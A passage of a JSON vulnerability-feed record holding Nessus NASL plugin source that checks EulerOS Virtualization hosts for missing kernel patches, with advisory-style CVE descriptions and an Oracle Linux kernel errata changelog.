\"CVE-2014-0155\",\n \"CVE-2014-3122\",\n \"CVE-2014-4014\",\n \"CVE-2015-3332\",\n \"CVE-2015-4176\",\n \"CVE-2016-2184\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2017-14340\",\n \"CVE-2017-16531\",\n \"CVE-2017-18218\",\n \"CVE-2017-18360\",\n \"CVE-2017-5669\",\n \"CVE-2018-10675\",\n \"CVE-2018-11232\",\n \"CVE-2018-18710\",\n \"CVE-2018-7480\"\n );\n script_bugtraq_id(\n 62042,\n 62740,\n 66688,\n 67162,\n 67988,\n 72322,\n 74232\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1471)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889)\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014)\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The 
snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl\n call.(CVE-2016-2545)\n\n - A flaw was found in the Linux kernel where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669)\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. 
NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155)\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421)\n\n - Off-by-one error in the get_prng_bytes function in\n crypto/ansi_cprng.c in the Linux kernel through 3.11.4\n makes it easier for context-dependent attackers to\n defeat cryptographic protection mechanisms via multiple\n requests for small amounts of data, leading to improper\n management of the state of the consumed\n data.(CVE-2013-4345)\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n uses an incorrect type of mutex, which allows local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call.(CVE-2016-2546)\n\n - The do_get_mempolicy function in mm/mempolicy.c in the\n Linux kernel before 4.12.9 allows local users to cause\n a denial of service (use-after-free) or possibly have\n unspecified other impact via crafted system\n calls.(CVE-2018-10675)\n\n - A certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)\n\n - It was found that the try_to_unmap_cluster() function\n in the Linux kernel's Memory Managment subsystem did\n not properly handle page locking in certain cases,\n which could potentially trigger the BUG_ON() macro in\n the mlock_vma_page() function. 
A local, unprivileged\n user could use this flaw to crash the\n system.(CVE-2014-3122)\n\n - The blkcg_init_queue function in block/blk-cgroup.c in\n the Linux kernel, before 4.11, allows local users to\n cause a denial of service (double free) or possibly\n have unspecified other impact by triggering a creation\n failure.(CVE-2018-7480)\n\n - The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)\n\n - The etm_setup_aux function in\n drivers/hwtracing/coresight/coresight-etm-perf.c in the\n Linux kernel before 4.10.2 allows attackers to cause a\n denial of service (panic) because a parameter is\n incorrectly used as a local variable.(CVE-2018-11232)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - A flaw was found where the XFS filesystem code\n mishandles a user-settable inode flag in the Linux\n kernel prior to 4.14-rc1. This can cause a local denial\n of service via a kernel panic.(CVE-2017-14340)\n\n - An issue was discovered in the Linux kernel through\n 4.19. 
An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds\n checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1471\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d86ae156\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n 
\"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:55:16", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. 
When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and\n reused.(CVE-2018-18281)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 9, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-04T00:00:00", "title": "EulerOS Virtualization 2.5.3 : kernel (EulerOS-SA-2019-1244)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19824", "CVE-2016-10741", "CVE-2018-18281", "CVE-2018-18559", "CVE-2017-18360"], "modified": "2019-04-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "cpe:/o:huawei:euleros:uvp:2.5.3"], "id": "EULEROS_SA-2019-1244.NASL", "href": "https://www.tenable.com/plugins/nessus/123712", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123712);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-10741\",\n \"CVE-2017-18360\",\n \"CVE-2018-18281\",\n \"CVE-2018-18559\",\n \"CVE-2018-19824\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.3 : kernel (EulerOS-SA-2019-1244)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the 
ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and\n reused.(CVE-2018-18281)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. 
Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1244\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ebc7ba2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.3\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.3\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.3\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_132\",\n \"kernel-devel-3.10.0-514.44.5.10_132\",\n \"kernel-headers-3.10.0-514.44.5.10_132\",\n \"kernel-tools-3.10.0-514.44.5.10_132\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_132\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_132\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "unix", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "description": "[4.1.12-124.27.1]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179] \n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179] \n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050] \n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374] \n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112] \n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112] \n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. 
(Tetsuo Handa) [Orabug: 29456281] \n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071] \n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071] \n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071] \n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071] \n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071] \n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071] \n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071] \n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071] \n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071] \n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071] \n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071] \n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071] \n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071] \n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071] \n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. 
Petersen) [Orabug: 29596510] \n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462] \n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401] \n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401] \n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525] \n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525] \n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113] \n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888] \n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 2, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "ELSA-2019-4642", "href": "http://linux.oracle.com/errata/ELSA-2019-4642.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}]}